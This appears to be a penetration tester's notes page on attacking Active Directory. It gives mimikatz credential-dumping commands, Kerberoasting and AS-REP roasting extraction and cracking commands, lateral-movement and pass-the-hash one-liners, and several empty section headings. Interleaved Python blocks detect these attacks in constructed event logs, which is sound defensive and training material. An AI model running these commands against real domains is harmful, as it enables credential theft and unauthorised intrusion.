# Active Directory

When testing Active Directory, our goals should be to:

* gain a foothold on a machine on the domain and elevate our privileges
* enumerate the domain to find additional accounts, users, etc. that ideally increase our privilege level on the domain
* gain access to the domain controller
* persist on the domain (situation dependent)

Assuming that we've already [enumerated](/3.-enumeration/active-directory.md) the domain, we should now be focused on gathering credentials to move laterally within the domain.

### Cached credential retrieval

Once you have local admin privileges on a domain-joined computer, you can dump the credentials cached in LSASS and the local SAM database.

#### Mimikatz

```
mimikatz.exe
privilege::debug
sekurlsa::logonpasswords    # dump credentials cached in LSASS
lsadump::sam                # dump the local SAM database
sekurlsa::tickets           # dump Kerberos tickets stored in memory
kerberos::list              # list cached Kerberos tickets for the current user
```
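From the defender's side, the access pattern behind the commands above is a process opening `lsass.exe` with memory-read rights. The following is an added example (not from these notes or from mimikatz) that triages Sysmon Event ID 10 (ProcessAccess) records for exactly that; the records are constructed, and the allow-list of legitimate LSASS readers is an assumption that has to be tuned per environment.

```python
# Added example, not part of the original notes: flag processes that open
# lsass.exe with memory-read rights, the access credential dumpers need.
# The records are constructed Sysmon Event ID 10 (ProcessAccess) fields and
# the allow-list is an assumption that must be tuned per environment.

PROCESS_VM_READ = 0x0010  # right needed to read another process's memory

# Assumed allow-list of legitimate LSASS readers (Windows components, the site's EDR engine).
ALLOWED_SOURCES = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\program files\example-edr\edr.exe",  # placeholder for the site's EDR/AV binary
}


def is_suspicious_lsass_access(event: dict) -> bool:
    """True when a non-allow-listed process opened lsass.exe with PROCESS_VM_READ."""
    if not event.get("TargetImage", "").lower().endswith(r"\lsass.exe"):
        return False
    if event.get("SourceImage", "").lower() in ALLOWED_SOURCES:
        return False
    granted = int(event.get("GrantedAccess", "0x0"), 16)  # Sysmon logs the mask as hex text
    return bool(granted & PROCESS_VM_READ)


def triage(events: list) -> list:
    """One line per suspicious access, suitable for an alert body."""
    return [
        f"{e['Computer']}: {e['SourceImage']} opened lsass.exe with {e['GrantedAccess']}"
        for e in events
        if is_suspicious_lsass_access(e)
    ]


# Constructed sample records (field names follow Sysmon Event ID 10).
SAMPLE_EVENTS = [
    {   # 0x1010 = PROCESS_VM_READ | PROCESS_QUERY_LIMITED_INFORMATION, the classic dumper mask
        "Computer": "WS01.test.local",
        "SourceImage": r"C:\Users\bob\Desktop\m.exe",
        "TargetImage": r"C:\Windows\system32\lsass.exe",
        "GrantedAccess": "0x1010",
    },
    {   # system component, allow-listed
        "Computer": "WS01.test.local",
        "SourceImage": r"C:\Windows\system32\csrss.exe",
        "TargetImage": r"C:\Windows\system32\lsass.exe",
        "GrantedAccess": "0x1FFFFF",
    },
    {   # Task Manager querying process information only, no memory read
        "Computer": "WS01.test.local",
        "SourceImage": r"C:\Windows\system32\Taskmgr.exe",
        "TargetImage": r"C:\Windows\system32\lsass.exe",
        "GrantedAccess": "0x1000",
    },
    {   # same mask against a different target, not LSASS
        "Computer": "WS01.test.local",
        "SourceImage": r"C:\Users\bob\Desktop\m.exe",
        "TargetImage": r"C:\Windows\system32\notepad.exe",
        "GrantedAccess": "0x1010",
    },
]

if __name__ == "__main__":
    for line in triage(SAMPLE_EVENTS):
        print(line)
```

The check keys on the `PROCESS_VM_READ` bit rather than on an exact mask such as `0x1010`, because dumpers vary the other bits; the allow-list is what keeps the rule quiet, so it should be built from a baseline of the host's real LSASS readers rather than guessed.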

### Attacks

#### Kerberoasting

If we find interesting service accounts while enumerating, we can export the Kerberos 5 TGS-REP etype 23 (RC4-HMAC) hash for offline cracking.

```
# Extract SPN hashes
crackmapexec ldap $ldapIPaddress -u user -p pass --kerberoasting output.txt
kerberos::list /export        # mimikatz: export cached tickets to .kirbi files

# Crack
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
hashcat -m 13100 hash.txt /path/to/wordlist -o output.txt
```

Alternatively, we can use the **Invoke-Kerberoast.ps1** script to enumerate SPNs, request tickets, and export them in a format ready for cracking.

#### AS-REP Roasting

The AS-REP roasting attack retrieves the Kerberos AS-REP hash of users that don't require Kerberos pre-authentication, so it can be cracked offline.

```
# Search for AS-REP roastable users
crackmapexec ldap $ldapIPaddress -u user -p 'pass' --asreproast output.txt
GetNPUsers.py domain/user:pass -dc-ip ipaddress -request -format john -outputfile output.txt

# Crack
john --format=krb5asrep --wordlist=/usr/share/wordlists/rockyou.txt output.txt
hashcat -m 18200 hash.txt /path/to/wordlist -o output.txt
```
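Both roasting attacks leave the same two traces on the domain controller: service-ticket requests (event 4769) for user-owned SPNs with encryption type 0x17, and TGT requests (event 4768) with pre-authentication type 0 and encryption type 0x17. The block below is an added example, not part of these notes or of any of the tools named above, that covers the Kerberoasting and AS-REP roasting sections together: it scores constructed 4769/4768 records and also checks a constructed LDAP export for the `userAccountControl` bit (0x400000, DONT_REQ_PREAUTH) that the `--asreproast` and `GetNPUsers.py` searches look for. The alert threshold is an assumption.

```python
# Added example, not part of the original notes: detect roasting activity in
# constructed Windows Security event records (4769 service-ticket requests,
# 4768 TGT requests) and find the account flag that makes AS-REP roasting
# possible. The alert threshold is an assumption; tune it to the environment.

RC4_HMAC = 0x17              # etype 23, the ticket type both attacks ask for because it cracks fastest
DONT_REQ_PREAUTH = 0x400000  # userAccountControl bit "Do not require Kerberos preauthentication"
KERBEROAST_THRESHOLD = 3     # assumed: distinct RC4 SPN tickets per requester before alerting


def is_roastable_spn_request(ev: dict) -> bool:
    """4769 for a user-owned SPN (not krbtgt, not a machine account) issued with RC4."""
    if ev["EventID"] != 4769 or int(ev["TicketEncryptionType"], 16) != RC4_HMAC:
        return False
    svc = ev["ServiceName"]
    return svc.lower() != "krbtgt" and not svc.endswith("$")


def is_asrep_roast(ev: dict) -> bool:
    """4768 with PreAuthType 0 (no pre-authentication) and an RC4-encrypted reply."""
    return (
        ev["EventID"] == 4768
        and ev["PreAuthType"] == 0
        and int(ev["TicketEncryptionType"], 16) == RC4_HMAC
    )


def detect_kerberoasting(events: list) -> dict:
    """Requesters that pulled RC4 tickets for at least KERBEROAST_THRESHOLD distinct SPNs."""
    spns_per_user = {}
    for ev in events:
        if is_roastable_spn_request(ev):
            spns_per_user.setdefault(ev["TargetUserName"], set()).add(ev["ServiceName"])
    return {u: sorted(s) for u, s in spns_per_user.items() if len(s) >= KERBEROAST_THRESHOLD}


def detect_asrep_roasting(events: list) -> list:
    """Accounts whose TGT was issued without pre-authentication using RC4."""
    return sorted({ev["TargetUserName"] for ev in events if is_asrep_roast(ev)})


def asrep_roastable_accounts(accounts: list) -> list:
    """Directory view: accounts with DONT_REQ_PREAUTH set, i.e. what the LDAP search returns."""
    return sorted(a["sAMAccountName"] for a in accounts if a["userAccountControl"] & DONT_REQ_PREAUTH)


# Constructed sample events (field names follow the Security log XML).
SAMPLE_EVENTS = [
    {"EventID": 4769, "TargetUserName": "jdoe", "ServiceName": "svc_sql", "TicketEncryptionType": "0x17"},
    {"EventID": 4769, "TargetUserName": "jdoe", "ServiceName": "svc_web", "TicketEncryptionType": "0x17"},
    {"EventID": 4769, "TargetUserName": "jdoe", "ServiceName": "svc_backup", "TicketEncryptionType": "0x17"},
    {"EventID": 4769, "TargetUserName": "jdoe", "ServiceName": "krbtgt", "TicketEncryptionType": "0x17"},   # TGT renewal, ignored
    {"EventID": 4769, "TargetUserName": "jdoe", "ServiceName": "WS01$", "TicketEncryptionType": "0x17"},    # machine account, ignored
    {"EventID": 4769, "TargetUserName": "alice", "ServiceName": "svc_sql", "TicketEncryptionType": "0x12"}, # AES256, normal
    {"EventID": 4768, "TargetUserName": "bob", "PreAuthType": 0, "TicketEncryptionType": "0x17"},          # roastable reply
    {"EventID": 4768, "TargetUserName": "alice", "PreAuthType": 2, "TicketEncryptionType": "0x12"},        # PA-ENC-TIMESTAMP, normal
]

# Constructed LDAP export: bob has DONT_REQ_PREAUTH (0x400000) on top of NORMAL_ACCOUNT | DONT_EXPIRE_PASSWD.
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "bob", "userAccountControl": 0x410200},
    {"sAMAccountName": "alice", "userAccountControl": 0x10200},
]

if __name__ == "__main__":
    print("kerberoasting:", detect_kerberoasting(SAMPLE_EVENTS))
    print("AS-REP roasting:", detect_asrep_roasting(SAMPLE_EVENTS))
    print("accounts without pre-auth:", asrep_roastable_accounts(SAMPLE_ACCOUNTS))
```

AES tickets (0x12) never reach the output, which is the mitigation in miniature: service accounts restricted to AES with long random passwords (or gMSAs) still produce 4769s, but nothing worth cracking, and clearing DONT_REQ_PREAUTH removes the 4768 path entirely.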

#### Unconstrained delegation

#### Constrained delegation

#### DCSync

### Lateral movement

Moving laterally within a domain is fairly straightforward once you have credentials.

#### Windows remote management

```
winrs -remote:hostname -u:username -p:password <command>
```

#### PS-Remoting


#### PS-EXEC

```
psexec.py domain/user:password@ipaddress
```

#### SMB-EXEC

```
smbexec.py username:password@ipaddress
```
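PsExec-style and smbexec-style execution both work by installing a service on the target over SMB, so the System log's event 7045 (a service was installed) is where they show up. The block below is an added example, not part of these notes or of the impacket or Sysinternals tools, that classifies constructed 7045 records by the patterns those tools leave: the `PSEXESVC` service, a `cmd.exe` service whose output is echoed back through `\\127.0.0.1\C$`, and a binary dropped straight into the root of the ADMIN$ share. The regexes are heuristics, not a complete signature set, and `winrs`/PS-Remoting create no service and are not covered.

```python
# Added example, not part of the original notes: classify System log 7045
# (service installed) records by the patterns remote-exec tools leave behind.
# The records are constructed and the regexes are heuristics, not a complete
# signature set; winrs/PS-Remoting do not create services and are not covered.
import re

# Executable placed directly in the Windows directory, i.e. the root of the ADMIN$ share.
ADMIN_SHARE_ROOT = re.compile(r"^(%systemroot%|c:\\windows)\\[^\\]+\.exe$")
# cmd.exe run as a service whose output is echoed back through the local C$ share.
ECHO_VIA_LOCAL_SHARE = re.compile(r"(%comspec%|cmd\.exe).*echo.*\\\\127\.0\.0\.1\\")


def classify_service_install(ev: dict):
    """Return a label for a suspicious 7045 record, or None if it looks benign."""
    if ev["EventID"] != 7045:
        return None
    path = ev["ImagePath"].strip('"').lower()
    if "psexesvc" in path:
        return "Sysinternals PsExec service"
    if ECHO_VIA_LOCAL_SHARE.search(path):
        return "service runs cmd.exe and echoes output via the local C$ share"
    if ADMIN_SHARE_ROOT.match(path):
        return "service binary dropped into ADMIN$ root"
    return None


def suspicious_services(events: list) -> list:
    """(Computer, ServiceName, label) for every record the classifier flags."""
    out = []
    for ev in events:
        label = classify_service_install(ev)
        if label:
            out.append((ev["Computer"], ev["ServiceName"], label))
    return out


# Constructed sample records (field names follow the System log XML for event 7045).
SAMPLE_EVENTS = [
    {"EventID": 7045, "Computer": "SRV01.test.local", "ServiceName": "PSEXESVC",
     "ImagePath": r"%SystemRoot%\PSEXESVC.exe"},
    {"EventID": 7045, "Computer": "SRV01.test.local", "ServiceName": "BTOBTO",
     "ImagePath": r"%COMSPEC% /Q /c echo whoami ^> \\127.0.0.1\C$\__output 2^>&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat"},
    {"EventID": 7045, "Computer": "SRV01.test.local", "ServiceName": "vQzRtKpL",
     "ImagePath": r"C:\Windows\vQzRtKpL.exe"},
    {"EventID": 7045, "Computer": "SRV01.test.local", "ServiceName": "Example Updater",
     "ImagePath": r'"C:\Program Files\Example\updater.exe" --service'},   # legitimate installer
    {"EventID": 7036, "Computer": "SRV01.test.local", "ServiceName": "Spooler",
     "ImagePath": r"C:\Windows\System32\spoolsv.exe"},                   # not a 7045 at all
]

if __name__ == "__main__":
    for row in suspicious_services(SAMPLE_EVENTS):
        print(*row, sep=" | ")
```

Pairing a flagged 7045 with the preceding 4624 type 3 logon on the same host gives the source address and the account that installed the service, which is what an incident responder needs to trace the hop back to the foothold.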

#### Pass the hash

Pass the hash allows attackers to authenticate to a remote system using an NTLM hash instead of the password.

{% hint style="info" %}
Many PTH tools require both the LM and NTLM hash as part of the command. If the LM hash is not available you can use a string of 32 zeros in its place.
{% endhint %}

```
# Passing-the-hash Toolkit
pth-winexe -U Administrator%$LMHash:$NTLMHash //$ipaddress cmd

# Mimikatz
privilege::debug
sekurlsa::pth /user:Administrator /domain:test.local /ntlm:$hash

# SMBclient
smbclient.py -hashes LMHash:NTLMHash domain/user@$ipaddress

# PS Exec
psexec.py -hashes :NTLMhash administrator@ipaddress
```

#### Overpass the hash

The overpass the hash technique uses the NTLM hash to obtain a Kerberos ticket, thus avoiding NTLM authentication altogether.

#### Pass the ticket

### Persistence

#### Golden tickets
